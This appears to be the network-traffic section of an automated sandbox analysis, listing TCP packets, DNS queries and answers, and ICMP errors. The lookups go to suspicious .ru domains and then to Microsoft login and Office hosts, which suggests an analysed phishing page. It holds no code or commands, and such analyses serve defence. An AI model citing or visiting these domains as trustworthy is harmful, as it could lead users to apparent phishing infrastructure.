                                                                                                                                                                                                  Jan 14, 2025 23:39:11.997740030 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.240767956 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.240848064 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.244215012 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.244220972 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.244343042 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.244349957 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.244570017 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.244657040 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.785180092 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.785235882 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.785249949 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.785270929 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.785284996 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.785315037 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.785979986 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.785988092 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.788407087 CET49843443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.788427114 CET4434984320.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.788496017 CET49843443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.788691998 CET49843443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:13.788702011 CET4434984320.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.025155067 CET4434984320.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.025245905 CET49843443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.025830030 CET49843443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.025832891 CET4434984320.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.026015043 CET49843443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.026017904 CET4434984320.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.585153103 CET4434984320.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.585259914 CET4434984320.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.585338116 CET49843443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.585805893 CET49843443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:15.585813046 CET4434984320.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:50.586422920 CET49857443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:39:50.586513996 CET44349857142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:50.586684942 CET49857443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:39:50.587012053 CET49857443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:39:50.587074995 CET44349857142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:51.216037035 CET44349857142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:51.216558933 CET49857443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:39:51.216624975 CET44349857142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:51.216948032 CET44349857142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:51.217348099 CET49857443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:39:51.217417955 CET44349857142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:51.271397114 CET49857443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:40:01.128748894 CET44349857142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:40:01.128822088 CET44349857142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:40:01.128981113 CET49857443192.168.2.16142.250.185.68
                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Jan 14, 2025 23:37:45.654148102 CET53530781.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:45.763962984 CET53624841.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.533653021 CET5127853192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.533902884 CET5214053192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.583632946 CET53521401.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.633752108 CET53512781.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.767067909 CET53535971.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.543247938 CET5719153192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.543643951 CET5633653192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.544039011 CET4962453192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.544200897 CET6045353192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.544563055 CET6095953192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.544804096 CET5700653192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.549868107 CET53571911.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.550389051 CET53563361.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.550755024 CET53604531.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.551008940 CET53496241.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.551134109 CET53609591.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.551464081 CET53570061.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.473759890 CET5360653192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.473906040 CET4924653192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.480642080 CET53536061.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.480674982 CET53492461.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.495280027 CET6103053192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.495413065 CET5208053192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.502238035 CET53610301.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.502382040 CET53520801.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.101718903 CET6046253192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.101843119 CET5500553192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.108223915 CET53604621.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.108340025 CET53550051.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.117199898 CET6488553192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.117326021 CET6049153192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.123974085 CET53648851.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.123997927 CET53604911.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.463802099 CET5176553192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.464140892 CET6321253192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.470892906 CET53517651.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.470917940 CET53632121.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.753779888 CET5535553192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.754007101 CET6391353192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.761096001 CET53553551.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.761696100 CET53639131.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.474260092 CET6279553192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.474407911 CET6276553192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.484771013 CET53627951.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.630976915 CET53627651.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.562530041 CET5404753192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.562715054 CET6386453192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.574590921 CET4943353192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.574708939 CET6373453192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.621942997 CET53494331.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.630624056 CET53637341.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.623903990 CET5800453192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.624119043 CET5534153192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.667150021 CET53553411.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:03.792072058 CET53619571.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.805687904 CET5712653192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.805687904 CET6022653192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.851440907 CET53602261.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.922427893 CET5657153192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.922732115 CET6323853192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:11.659645081 CET53625711.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:22.759457111 CET53542541.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:45.613907099 CET53607411.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:45.757930994 CET53560101.1.1.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.762402058 CET5223853192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.762476921 CET5991553192.168.2.161.1.1.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:54.576914072 CET138138192.168.2.16192.168.2.255
                                                                                                                                                                                                  Jan 14, 2025 23:39:16.562747955 CET53594381.1.1.1192.168.2.16
                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.631055117 CET192.168.2.161.1.1.1c31d(Port unreachable)Destination Unreachable
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.667258024 CET192.168.2.161.1.1.1c277(Port unreachable)Destination Unreachable
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.851593971 CET192.168.2.161.1.1.1c277(Port unreachable)Destination Unreachable
                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.533653021 CET192.168.2.161.1.1.10xd6acStandard query (0)6y.tickarmoz.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.533902884 CET192.168.2.161.1.1.10x8f3cStandard query (0)6y.tickarmoz.ru65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.543247938 CET192.168.2.161.1.1.10x8a32Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.543643951 CET192.168.2.161.1.1.10x64a7Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.544039011 CET192.168.2.161.1.1.10xf8b6Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.544200897 CET192.168.2.161.1.1.10x5f64Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.544563055 CET192.168.2.161.1.1.10xdb09Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.544804096 CET192.168.2.161.1.1.10xbff1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.473759890 CET192.168.2.161.1.1.10x34b0Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.473906040 CET192.168.2.161.1.1.10x4572Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.495280027 CET192.168.2.161.1.1.10xe1aaStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.495413065 CET192.168.2.161.1.1.10xd9abStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.101718903 CET192.168.2.161.1.1.10xb99eStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.101843119 CET192.168.2.161.1.1.10x85deStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.117199898 CET192.168.2.161.1.1.10x94f1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.117326021 CET192.168.2.161.1.1.10x4e2fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.463802099 CET192.168.2.161.1.1.10xcefbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.464140892 CET192.168.2.161.1.1.10x6715Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.753779888 CET192.168.2.161.1.1.10x4e37Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.754007101 CET192.168.2.161.1.1.10xe112Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.474260092 CET192.168.2.161.1.1.10xa0f5Standard query (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.474407911 CET192.168.2.161.1.1.10x3a3fStandard query (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.562530041 CET192.168.2.161.1.1.10x8c42Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.562715054 CET192.168.2.161.1.1.10x8883Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.574590921 CET192.168.2.161.1.1.10x2ccbStandard query (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.574708939 CET192.168.2.161.1.1.10x9ac5Standard query (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.623903990 CET192.168.2.161.1.1.10x699cStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.624119043 CET192.168.2.161.1.1.10x1c59Standard query (0)www.office.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.805687904 CET192.168.2.161.1.1.10xb40eStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:04.805687904 CET192.168.2.161.1.1.10xa527Standard query (0)www.office.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.922427893 CET192.168.2.161.1.1.10xf33fStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.922732115 CET192.168.2.161.1.1.10xad0dStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.762402058 CET192.168.2.161.1.1.10xc833Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.762476921 CET192.168.2.161.1.1.10xa8a4Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.583632946 CET1.1.1.1192.168.2.160x8f3cNo error (0)6y.tickarmoz.ru65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.633752108 CET1.1.1.1192.168.2.160xd6acNo error (0)6y.tickarmoz.ru172.67.140.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:46.633752108 CET1.1.1.1192.168.2.160xd6acNo error (0)6y.tickarmoz.ru104.21.94.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.549868107 CET1.1.1.1192.168.2.160x8a32No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.549868107 CET1.1.1.1192.168.2.160x8a32No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.549868107 CET1.1.1.1192.168.2.160x8a32No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.549868107 CET1.1.1.1192.168.2.160x8a32No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.550755024 CET1.1.1.1192.168.2.160x5f64No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.551008940 CET1.1.1.1192.168.2.160xf8b6No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.551008940 CET1.1.1.1192.168.2.160xf8b6No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.551134109 CET1.1.1.1192.168.2.160xdb09No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.551134109 CET1.1.1.1192.168.2.160xdb09No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:48.551464081 CET1.1.1.1192.168.2.160xbff1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.480642080 CET1.1.1.1192.168.2.160x34b0No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.480642080 CET1.1.1.1192.168.2.160x34b0No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.480674982 CET1.1.1.1192.168.2.160x4572No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.502238035 CET1.1.1.1192.168.2.160xe1aaNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.502238035 CET1.1.1.1192.168.2.160xe1aaNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.502238035 CET1.1.1.1192.168.2.160xe1aaNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:49.502238035 CET1.1.1.1192.168.2.160xe1aaNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.108223915 CET1.1.1.1192.168.2.160xb99eNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.108223915 CET1.1.1.1192.168.2.160xb99eNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.108340025 CET1.1.1.1192.168.2.160x85deNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.123974085 CET1.1.1.1192.168.2.160x94f1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.123974085 CET1.1.1.1192.168.2.160x94f1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.123997927 CET1.1.1.1192.168.2.160x4e2fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.470892906 CET1.1.1.1192.168.2.160xcefbNo error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.470917940 CET1.1.1.1192.168.2.160x6715No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.761096001 CET1.1.1.1192.168.2.160x4e37No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.484771013 CET1.1.1.1192.168.2.160xa0f5No error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.484771013 CET1.1.1.1192.168.2.160xa0f5No error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.484771013 CET1.1.1.1192.168.2.160xa0f5No error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.484771013 CET1.1.1.1192.168.2.160xa0f5No error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.484771013 CET1.1.1.1192.168.2.160xa0f5No error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.484771013 CET1.1.1.1192.168.2.160xa0f5No error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.484771013 CET1.1.1.1192.168.2.160xa0f5No error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.630976915 CET1.1.1.1192.168.2.160x3a3fNo error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.569199085 CET1.1.1.1192.168.2.160x8c42No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.569806099 CET1.1.1.1192.168.2.160x8883No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.621942997 CET1.1.1.1192.168.2.160x2ccbNo error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.621942997 CET1.1.1.1192.168.2.160x2ccbNo error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.621942997 CET1.1.1.1192.168.2.160x2ccbNo error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.621942997 CET1.1.1.1192.168.2.160x2ccbNo error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.621942997 CET1.1.1.1192.168.2.160x2ccbNo error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.621942997 CET1.1.1.1192.168.2.160x2ccbNo error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.621942997 CET1.1.1.1192.168.2.160x2ccbNo error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.630624056 CET1.1.1.1192.168.2.160x9ac5No error (0)x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru65IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.630764008 CET1.1.1.1192.168.2.160x699cNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.630764008 CET1.1.1.1192.168.2.160x699cNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.667150021 CET1.1.1.1192.168.2.160x1c59No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.667150021 CET1.1.1.1192.168.2.160x1c59No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
